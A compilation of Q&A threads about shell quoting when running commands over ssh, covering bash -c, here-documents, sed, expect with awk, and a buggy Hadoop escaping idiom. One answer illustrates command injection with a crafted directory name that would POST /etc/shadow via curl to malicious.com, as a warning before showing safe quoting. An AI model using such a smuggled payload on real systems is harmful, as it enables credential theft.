How to use specific shell during pseudo-tty allocation? - bash

I want to be able to execute a remote command in bash instead of the default zsh on the remote machine (preferably without having to modify settings on the remote machine).
Example:
ssh -t -t some-command-that-only-works-in-bash-to-execute-remotely

You can do this:
ssh user@host "bash -c \"some-command-that-only-works-in-bash-to-execute-remotely\""
Please be careful with quoting, however. The arguments to your ssh command first undergo local expansion and word splitting, then are passed to ssh and submitted to the remote shell, where they undergo a second round of (remote) expansion and word splitting.
For instance, this will echo the local value of LOGNAME:
ssh user@host "bash -c \"echo $LOGNAME\""
This will echo the remote value of LOGNAME:
ssh user@host "bash -c \"echo \$LOGNAME\""
ssh user@host 'bash -c "echo $LOGNAME"'
If you want to understand why, try replacing ssh with echo and see what command the remote end would receive.
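For example, running the echo substitution locally makes the two cases visible at once (a quick sketch; LOGNAME is just the variable used above):

```shell
# Replace ssh with echo to preview what the remote shell would receive.
echo "bash -c \"echo $LOGNAME\""    # $LOGNAME is expanded locally, before ssh runs
echo "bash -c \"echo \$LOGNAME\""   # \$ survives local parsing, so it expands remotely
```

The second line prints a literal `$LOGNAME`, which is exactly what the remote shell would then expand.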
You can also do this:
echo "some-command-that-only-works-in-bash" | ssh user@host bash
ssh user@host bash < <(echo "some-command-that-only-works-in-bash")
You could issue multiple commands with this method (one line each) and they would all be executed remotely. Piping the output of a function designed to issue several commands is useful once in a while, as is redirecting a local script so that it can be executed on the remote machine without having to be copied.
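A minimal local sketch of that pattern (the function name is made up; swap `bash` for `ssh user@host bash` to run the generated commands remotely):

```shell
# Hypothetical generator: emits one command per line.
gen_cmds() {
    echo 'echo first'
    echo 'echo second'
}

# Run locally; over ssh this would be: gen_cmds | ssh user@host bash
gen_cmds | bash
```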

As mentioned in previous comments, here-document can be utilized as such:
me@mycomp ~ $ ssh me@127.0.0.1 "/bin/sh <<%
echo 'user\np@55word!' > ~/cf1
%"
me@127.0.0.1's password:
me@mycomp ~ $ cat ~/cf1
user
p@55word!
From the man page:
The following redirection is often called a "here-document".
[n]<< delimiter
        here-doc-text ...
delimiter
All the text on successive lines up to the delimiter is saved away and made available to the command on standard input, or file descriptor n if it is specified. If the delimiter as specified on the initial line is quoted, then the here-doc-text is treated literally, otherwise the text is subjected to parameter expansion, command substitution, and arithmetic expansion (as described in the section on "Expansions"). If the operator is "<<-" instead of "<<", then leading tabs in the here-doc-text are stripped.
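The quoted-versus-unquoted delimiter rule described above is easy to see with a throwaway variable:

```shell
name=world

# Unquoted delimiter: the shell expands $name inside the here-document.
cat <<EOF
unquoted: $name
EOF

# Quoted delimiter: the here-document text is taken literally.
cat <<'EOF'
quoted: $name
EOF
```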

Sed Command (unterminated 's' command)

I am trying to add an argument after the batch_start flag. This is the error it gives me. Any idea on how to fix this?
$ sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile
sed: -e expression #1, char 27: unterminated `s' command
The root problem is that the command is being sent over ssh; that means it's running through two levels of shell parsing, one on the local computer, then another on the remote computer. That means it goes through quote/escape parsing, application, and removal twice, so you need two "layers" of quoting/escaping.
The command in the last comment doesn't parse (mismatched quotes), but I can reproduce the error message with this command:
ssh remoteHost "sudo sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile"
This sort-of has two levels of quotes, but quotes don't nest, so it doesn't work. The local shell parses this as a double-quoted string "sudo sed -i ", then an unquoted section s/batch_start.*/batch_start\ 1111/ (which contains an escaped space, so it'll remove the escape), then another double-quoted section: " /tmp/runfile". Since there are no spaces between them, they all get passed to ssh as a single argument. You can see the post-parsing string by replacing ssh remoteHost with echo:
$ echo "sudo sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile"
sudo sed -i s/batch_start.*/batch_start 1111/ /tmp/runfile
...so that's the command the remote shell will execute. Since there's a space between s/batch_start.*/batch_start and 1111/, they get passed to sed as separate arguments, and it treats the first as the command to execute (which is missing a close /) and the second as a filename.
Solution: there are many ways to correct the quoting. You can use the echo trick to see what'll get sent to the remote shell. I tend to prefer single-quotes around the entire command, and then just quote normally inside that (as long as the inner command doesn't itself contain single-quotes). In this case, that means:
ssh remoteHost 'sudo sed -i "s/batch_start.*/batch_start 1111/" /tmp/runfile'
which executes this on the remote computer:
sudo sed -i "s/batch_start.*/batch_start 1111/" /tmp/runfile
(note that I removed the escape on the space.)
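To confirm the sed expression itself behaves as intended, you can try it on fabricated sample input locally, without -i and without touching any file:

```shell
# Feed a sample line through the same substitution.
printf 'batch_start old_value\n' | sed 's/batch_start.*/batch_start 1111/'
# prints: batch_start 1111
```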

How do I call Awk Print Variable within Expect Script that uses Spawn?

I've been creating some basic system health checks, and one of the checks includes a yum repo health status that uses one of Chef's tools called 'knife'. However, when I try to awk a column, I get
can't read "4": no such variable.
Here is what I am currently using:
read -s -p "enter password: " pass
/usr/bin/expect << EOF
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v| grep Repo-name| awk '{print $4}'\" "
expect {
    -nocase password: { send "$pass\r" }
}
expect eof
EOF
I've tried other variations as well, such as replacing the awk single quotes with double curly braces, escaping the variable, and even setting the variable to the command, and keep getting the same negative results:
awk {{print $4}}
awk '{print \$4}'
awk '\{print \$4\}'
awk {\{print \$4\}}
Does anyone know how I can pass this awk column selector variable within a spawned knife ssh command that sends the variable to the ssh host?
This line:
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print $4}'\""
has many layers of quoting (Tcl/Expect, ssh, bash, awk), and it's quoting of different types. Such things are usually pretty nasty and can require using rather a lot of backslashes to persuade values to go through the outer layers unmolested. In particular, Tcl and the shell both want to get their hands on variables whose uses start with $ and continue with alphanumerics. (Backslashes that go in deep need to be themselves quoted with more backslashes, making the code hard to read and hard to understand precisely.)
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print \\\$4}'\""
However, there's one big advantage available to us: we can put much of the code into braces at the outer level as we are not actually substituting anything from Tcl in there.
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v|grep Repo-name|awk '{print \$4}'"}
The thing inside the braces is conventional shell code, not Tcl. And in fact we can probably simplify further, as neither grep nor awk need to be elevated:
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v"|grep Repo-name|awk '{print $4}'}
Depending on the sudo configuration, you might even be able to do this (which I'd actually rather people did on systems I controlled anyway, rather than handing out general access to root shells):
spawn knife ssh -m host1 {sudo yum repolist -v|grep Repo-name|awk '{print $4}'}
And if my awk is good enough, you can get rid of the grep like this:
spawn knife ssh -m host1 {sudo yum repolist -v|awk '/Repo-name/{print $4}'}
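Locally, with fabricated sample input, the combined match-and-print awk program behaves like this:

```shell
# awk matches the line containing Repo-name and prints its 4th field,
# replacing the separate grep. Input lines here are made up.
printf 'Repo-name a b 42\nOther 1 2 3\n' | awk '/Repo-name/{print $4}'
# prints: 42
```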
This is starting to look more manageable. However, if you want to substitute Repo-name for a Tcl variable, you need a little more work that reintroduces a backslash, but it is now all much tamer than before, as there are fewer layers of complexity to create headaches.
set repo "Repo-name"
spawn knife ssh -m host1 "sudo yum repolist -v|awk '/$repo/{print \$4}'"
In practice, I'd be more likely to get rid of the awk entirely and do that part in Tcl code, as well as setting up key-based direct access to the root account, allowing avoiding the sudo, but that's getting rather beyond the scope of your original question.
Donal Fellows' helpful answer contains great analysis and advice.
To complement it with an explanation of why replacing $4 with \\\$4 worked:
The goal is ultimately for awk to see $4 as-is, so we must escape for all intermediate layers in which $ has special meaning.
I'll use a simplified command in the examples below.
Let's start by temporarily eliminating the shell layer, by quoting the opening here-doc delimiter as 'EOF', which makes the content behave like a single-quoted string; i.e., the shell treats the content as a literal, without applying expansions:
expect <<'EOF' # EOF is quoted -> literal here-doc
spawn bash -c "awk '{ print \$1 }' <<<'hi there'"
expect eof
EOF
Output:
spawn bash -c awk '{ print $1 }' <<<'hi there'
hi
Note that $1 had to be escaped as \$1 to prevent expect from interpreting it as an expect variable reference.
Given that the here-doc in your question uses an unquoted opening here-doc delimiter (EOF), the shell treats the content as if it were a double-quoted string; i.e., shell expansions are applied.
Given that the shell now expands the script first, we must add an extra layer of escaping for the shell, by prepending two extra \ to \$1:
expect <<EOF # EOF is unquoted -> shell expansions happen
spawn bash -c "awk '{ print \\\$1 }' <<<'hi there'"
expect eof
EOF
This yields the same output as above.
Based on the rules of parsing an unquoted here-doc (which, as stated, is parsed like a double-quoted string), the shell turns \\ into a single \, and \$1 into literal $1, combining to literal \$1, which is what the expect script needs to see.
(Verify with echo "\\\$1" in the shell.)
Simplifying the approach with command-line arguments and a quoted here-doc:
As you can see, the multiple layers of quoting (escaping) can get confusing.
One way to avoid problems is to:
use a quoted here-doc, so that the shell doesn't interpret it in any way, so you can then focus on expect's quoting needs
pass any shell variable values via command-line arguments, and reference them from inside the expect script as expressions (either directly or by assigning them to an expect variable first).
expect -f - 'hi there' <<'EOF'
set txt [lindex $argv 0]
spawn bash -c "awk '{ print \$1 }' <<<'$txt'"
expect eof
EOF
Text hi there is passed as the 1st (and only) command-line argument, which can be referenced as [lindex $argv 0] in the script.
(The -f - option explicitly tells expect to read its script from stdin, which is necessary here to distinguish the script from the arguments.)
set txt ... creates expect variable $txt, which can then be used unquoted or as part of double-quoted strings.
To create literal strings in expect, use {...} (the equivalent of the shell's '...').

Escaping $ variable in sed over ssh command?

I have a command like this:
ssh user@hostname 'sed -e "s|foo|${bar}|" /home/data/base_out.sql > /home/data/out.sql'
The sed command is working in a local shell, but it is not expanding the variable over the ssh command. Thanks!
The rule is that within single quotes, parameters are not expanded. You have single quotes around the entire command.
Try this:
ssh user@hostname "sed -e 's|foo|$bar|' /home/data/base_out.sql > /home/data/out.sql"
Now $bar is expanded before the command string is passed as an argument to ssh, which is what you want.
I removed the curly braces around ${bar} because I believe they offer a false sense of security. In this case, they are not protecting you against any of the issues associated using shell variables in sed commands.
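You can see the difference locally by echoing both quoting styles (bar is a throwaway variable standing in for yours):

```shell
bar=REPLACED
echo 'sed -e "s|foo|${bar}|"'   # single quotes: ${bar} stays literal
echo "sed -e 's|foo|$bar|'"     # double quotes: $bar expands before ssh ever sees it
```

The second form is what reaches the remote shell with the value already substituted.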

What does $"${@// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
The "${@// /\\ }" part is a shell parameter expansion. Why add a $ before it? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$@" expands to the full list of arguments given to the current script.
"${@//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${@// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to that space.
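A quick local demonstration of that expansion, using set -- to fake a positional-parameter list:

```shell
# Fake an argument list, then apply the space-escaping expansion.
set -- "hello world" "goodbye world"
printf '%s\n' "${@// /\\ }"
# prints:
# hello\ world
# goodbye\ world
```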
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${@// /\\ }" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$@"
# on the remote system, run "bash -s", with the script to run fed on stdin;
# this guarantees that the remote shell is bash, which is the shell that
# printf %q quotes content to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
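The round trip can be checked locally without ssh, by handing the quoted string back to a fresh bash (the sample arguments are made up):

```shell
# Quote an argument list with printf %q, then have a child bash re-expand it.
set -- "hello world" 'a$b' 'semi;colon'
printf -v cmd_str '%q ' "$@"
bash -c "printf '%s\n' $cmd_str"
# prints each original argument on its own line, intact
```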
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
    python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}
cmd_str=$(posix_quote "$@")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${@// /\\ } expansion escapes that whitespace so that the expansion which takes place next keeps the whitespace as part of the argument for the remote command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid@server ls /tmp
And if you're in a different country and really wanted some non-English characters, those are preserved by the surrounding $"...", which performs a locale-specific translation lookup.

read file in here document bash script

When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of here-document into file and execute it, everything works as expected (I get content of /etc/fstab file).
Could anyone explain why?
UPDATE:
Answering a question about why would I need to pass here-doc to bash this way, here is what I'm actually trying to do:
ssh user@host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script. It will be substituted with empty value before the here-document will be passed to a child bash. To avoid substitution a $-sign should be escaped with "\".
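The difference is easy to demonstrate with a variable set only in the parent shell (a, as above, is just a throwaway name):

```shell
a=parent
bash <<EOF
echo "unescaped: [$a]"
echo "escaped:   [\$a]"
EOF
# prints:
# unescaped: [parent]
# escaped:   []
```

The unescaped reference is substituted by the parent before the child bash ever runs; the escaped one reaches the child, where a is unset.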
You don't need a here-document here. If you were writing a script, you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update was correct. The <<- will remove one leading tab character (but not spaces) from each line of text until your EOF delimiter (which could have been named anything). Using << without the '-' would expect each line of the HEREdoc to start in column 0.
Next, you are using ssh getting your shell from a remote host. This also implies that your /tmp/list_of_files will also exist on the remote machine. This also means any local shell meta-character should be escaped to ensure it is passed to the program/location where you actually want it expanded.
I do not believe a HEREdoc is necessary, when you can pass a complete semicolon separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user@host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date +%s) -e 's/'$OLD'/'$NEW'/g' \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.
